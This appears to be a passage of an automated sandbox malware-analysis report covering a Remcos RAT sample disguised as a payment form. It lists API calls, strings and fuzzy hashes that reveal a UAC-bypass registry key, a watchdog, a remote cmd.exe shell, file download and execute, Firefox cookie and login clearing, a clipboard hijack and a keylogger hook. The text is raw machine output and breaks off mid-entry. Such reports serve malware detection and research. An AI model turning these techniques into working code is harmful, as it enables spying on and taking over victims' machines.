                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: File$CloseHandle$CreatePointerWrite
                                              • String ID:
                                              • API String ID: 1852769593-0
                                              • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                              • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                              • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                              • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B

                                              APIs
                                              • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,?), ref: 0041220F
                                              • RegSetValueExW.KERNELBASE(?,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe), ref: 0041223E
                                              • RegCloseKey.KERNELBASE(?,?,80000001,?,0040674F,00469654,C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe), ref: 00412249
                                              Strings
                                              • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: Software\Classes\mscfile\shell\open\command
                                              • API String ID: 1818849710-505396733
                                              • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                              • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                              • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                              • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94

                                              APIs
                                              • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                              • RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 46f44901f2d2fc7136e1423d50997732e2853f2e089d8a6a99562a992c0dbb79
                                              • Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
                                              • Opcode Fuzzy Hash: 46f44901f2d2fc7136e1423d50997732e2853f2e089d8a6a99562a992c0dbb79
                                              • Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                              • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                              • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                              • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                              • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                              • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                              • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                                • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                                • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                                • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                              • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                              • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                              • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                              • API String ID: 3018269243-1736093966
                                              • Opcode ID: b08e6d8147c48ad56d9e449d8a64e86690144420b0335e728f1a7b964109e91d
                                              • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                              • Opcode Fuzzy Hash: b08e6d8147c48ad56d9e449d8a64e86690144420b0335e728f1a7b964109e91d
                                              • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                              • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                                • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                                • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                                • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                                • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                                • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                                • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                              • DeleteFileA.KERNEL32(?), ref: 0040768E
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                              • API String ID: 1385304114-1507758755
                                              • Opcode ID: 4212707202319c9523e4f82c6f0df1e9ac7ca4435ef39e8a86c91b373024ad92
                                              • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                                              • Opcode Fuzzy Hash: 4212707202319c9523e4f82c6f0df1e9ac7ca4435ef39e8a86c91b373024ad92
                                              • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 004056C6
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              • __Init_thread_footer.LIBCMT ref: 00405703
                                              • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                              • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                                • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                              • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                              • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                              • CloseHandle.KERNEL32 ref: 00405A03
                                              • CloseHandle.KERNEL32 ref: 00405A0B
                                              • CloseHandle.KERNEL32 ref: 00405A1D
                                              • CloseHandle.KERNEL32 ref: 00405A25
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                              • String ID: SystemDrive$cmd.exe
                                              • API String ID: 2994406822-3633465311
                                              • Opcode ID: d90749906c699a264a83dd809c516440a47082a8c216af21d987cd76b0d6e669
                                              • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                              • Opcode Fuzzy Hash: d90749906c699a264a83dd809c516440a47082a8c216af21d987cd76b0d6e669
                                              • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                              • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                              • FindClose.KERNEL32(00000000), ref: 0040AC53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                              • API String ID: 1164774033-3681987949
                                              • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                              • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                              • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                              • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                              • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                              • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                              • FindClose.KERNEL32(00000000), ref: 0040AE11
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$Close$File$FirstNext
                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                              • API String ID: 3527384056-432212279
                                              • Opcode ID: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                                              • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                                              • Opcode Fuzzy Hash: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                                              • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                                              APIs
                                              • OpenClipboard.USER32 ref: 00414EC2
                                              • EmptyClipboard.USER32 ref: 00414ED0
                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                              • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                              • CloseClipboard.USER32 ref: 00414F55
                                              • OpenClipboard.USER32 ref: 00414F5C
                                              • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                              • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                              • CloseClipboard.USER32 ref: 00414F84
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                              • String ID:
                                              • API String ID: 3520204547-0
                                              • Opcode ID: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                                              • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                                              • Opcode Fuzzy Hash: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                                              • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0$1$2$3$4$5$6$7
                                              • API String ID: 0-3177665633
                                              • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                              • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                              • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                              • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                              APIs
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                              • GetLastError.KERNEL32 ref: 00418771
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                              • String ID:
                                              • API String ID: 3587775597-0
                                              • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                              • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                              • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                              • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                              • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                              • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                              • API String ID: 1164774033-405221262
                                              • Opcode ID: 732e7af7135910ff51b9ed5018c4d5526696ee878c57bff14cd179f8b8a647cb
                                              • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                              • Opcode Fuzzy Hash: 732e7af7135910ff51b9ed5018c4d5526696ee878c57bff14cd179f8b8a647cb
                                              • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                                                • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                              • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                              • String ID:
                                              • API String ID: 2341273852-0
                                              • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                              • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                              • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                              • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                              APIs
                                                • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                              • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                              • SetLastError.KERNEL32(0000000E), ref: 0041082E
                                                • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                                              • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                                              • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                                              • SetLastError.KERNEL32(0000045A), ref: 0041098F
                                                • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                                                • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                              • String ID: $.F
                                              • API String ID: 3950776272-1421728423
                                              • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                              • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                              • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                              • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                              • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                              • GetLastError.KERNEL32 ref: 00409375
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                              • TranslateMessage.USER32(?), ref: 004093D2
                                              • DispatchMessageA.USER32(?), ref: 004093DD
                                              Strings
                                              • Keylogger initialization failure: error , xrefs: 00409389
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                              • String ID: Keylogger initialization failure: error
                                              • API String ID: 3219506041-952744263
                                              • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                              • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                              • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                              • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                                              APIs
                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                              • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                              • API String ID: 2127411465-314212984
                                              • Opcode ID: 2b43a25140932724833c60cc0227af9bd2fbccba54ac5737bf4cc1b9c60871e3
                                              • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                              • Opcode Fuzzy Hash: 2b43a25140932724833c60cc0227af9bd2fbccba54ac5737bf4cc1b9c60871e3
                                              • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                              APIs
                                              • _free.LIBCMT ref: 00446741
                                              • _free.LIBCMT ref: 00446765
                                              • _free.LIBCMT ref: 004468EC
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                              • _free.LIBCMT ref: 00446AB8
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                              • String ID:
                                              • API String ID: 314583886-0
                                              • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                              • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                                              • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                              • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                                              APIs
                                                • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                                • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                                                • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                                              • Sleep.KERNEL32(00000BB8), ref: 0040E243
                                              • ExitProcess.KERNEL32 ref: 0040E2B4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                              • String ID: 3.8.0 Pro$override$pth_unenc$!G
                                              • API String ID: 2281282204-1386060931
                                              • Opcode ID: 3c32f36523e6925df0e1b9cd6565e243fede22dfd81d00af8e344aafa96c93a2
                                              • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                              • Opcode Fuzzy Hash: 3c32f36523e6925df0e1b9cd6565e243fede22dfd81d00af8e344aafa96c93a2
                                              • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                              APIs
                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
